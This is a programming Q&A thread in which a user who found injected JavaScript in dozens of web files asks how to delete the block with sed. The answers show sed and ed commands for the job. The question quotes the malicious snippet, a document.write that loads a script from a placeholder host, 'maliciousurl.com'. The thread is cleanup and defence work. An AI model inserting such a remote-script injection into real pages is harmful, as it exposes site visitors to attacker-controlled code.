How to delete multiple lines from text file, including matched line?

Question

I found some malicious JavaScript inserted into dozens of files.

The malicious code looks like this:

/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');

/*/123456*/

Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."

In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.

sed -i '/pattern to match/d' ./infile

But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.

So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?

I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.

sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

Jonathan Leffler · Answer 1 · 2014-04-15T03:08:17.397

1

You need to match on the begin and end comments, not the document.write line:

sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'

This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.

From the sed manual on Mac OS X:

In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.

Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):

ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF

This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

edited Apr 15 '14 at 03:08

answered Apr 15 '14 at 03:02

Jonathan Leffler

730,956
141
904
1,278

your pattern starts with `\%`. Are you escaping the percent? Before iI saw your answer I tried something similar, using `~` as delimiter, and it did not work: `sed -i 's~/\**\*/*/\*/*\*/~~g' test.js` – Buttle Butkus Apr 15 '14 at 03:06
Also note that the malicious code seems to be added to the bottom of every file. And it is not always the same '123456'. In fact, I think they are hexadecimal digits. I've found some like this: "028b70" – Buttle Butkus Apr 15 '14 at 03:08
I tried your `sed -e` command, but I replaced '123456' with `*`. It seems to have removed the malicious closing tag, but nothing else. – Buttle Butkus Apr 15 '14 at 03:13
These details are important information; they materially affect the answer. I've addressed the `\%` notation with a quote from the manual. Your regex doesn't match things correctly. You might have been OK with `s~/\*.*\*/~~` to eliminate the before comments if nothing else in your file uses C-style comments. You need to distinguish between shell `*` globbing and regular expression `*` which means 0 or more of the preceding term in the regex. – Jonathan Leffler Apr 15 '14 at 03:14
ahhh I see. I can't just use `*` by itself. It has to be attached to something. Can I use `[hex]*` or something like that? – Buttle Butkus Apr 15 '14 at 03:16
Yes, you can use `[hex]*` to look for zero or more characters from the letters `h`, `e` and `x` in any sequence. If you want hex digits, then you need `[[:xdigit:]]*` (or if you want 1-4 of them, then (classically) `[[:xdigit:]]\{1,4\}`, or in modern versions with either `-E` (Mac OS X, BSD) or `-r` (GNU), `[[:xdigit:]]{1,4}`. – Jonathan Leffler Apr 15 '14 at 04:02
lol, you're funny. [hex]* is definitely not what I'm looking for. [[:xdigit:]] might be worth a try. I'm doing this on CentOS 6 by the way. I ended up cleaning up another 40 files manually with VIM. There are still other "infected" files on the server I can test this on, though. – Buttle Butkus Apr 15 '14 at 04:12

How to delete multiple lines from text file, including matched line?

1 Answers1